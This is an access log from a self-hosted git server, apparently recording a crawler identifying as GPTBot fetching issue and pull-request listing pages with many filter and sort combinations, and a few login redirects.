"https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/import%20sys.py" -[17/Feb/2026:17:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PythonTest/import%20sys.py" -[17/Feb/2026:17:58:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/import%20sys.py" -[17/Feb/2026:17:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PythonTest/import%20sys.py" -[17/Feb/2026:17:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:17:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:17:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:17:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:17:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:17:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:17:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:17:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 